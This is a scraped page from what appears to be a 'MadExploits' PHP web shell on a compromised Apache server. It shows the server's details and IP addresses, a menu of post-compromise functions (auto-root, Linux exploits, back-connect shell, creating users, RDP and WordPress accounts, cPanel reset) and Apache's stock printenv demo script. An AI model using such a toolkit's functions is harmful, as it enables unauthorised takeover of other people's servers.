Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.148.106.159
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
apache /
cgi-bin /
[ HOME SHELL ]
Name
Size
Permission
Action
printenv
820
B
-rw-r--r--
printenv.vbs
1.05
KB
-rw-r--r--
printenv.wsf
1.11
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : printenv.wsf
' ' To permit this cgi, replace ' on the first line above with the ' appropriate shebang, f.e. '!c:/windows/system32/cscript -nologo ' ' ***** !!! WARNING !!! ***** ' This script echoes the server environment variables and therefore ' leaks information - so NEVER use it in a live server environment! ' It is provided only for testing purpose. ' Also note that it is subject to cross site scripting attacks on ' MS IE and any other browser which fails to honor RFC2616. '' '' printenv -- demo CGI program which just prints its environment '' <job> <script language="JScript"> WScript.Echo("Content-type: text/plain; charset=iso-8859-1\n"); var objShell = new ActiveXObject("WScript.Shell"); var objArray = new Array(); var e = new Enumerator(objShell.Environment("PROCESS")); for (;!e.atEnd();e.moveNext()) { var i = e.item().indexOf("="); var envvar = e.item().substring(0, i); var envval = e.item().substring(i + 1, e.item().length); envval = envval.replace("\n", "\\n"); objArray.push(envvar + "=\"" + envval + "\""); } objArray.sort(); WScript.Echo(objArray.join("\n")); </script> </job>
Close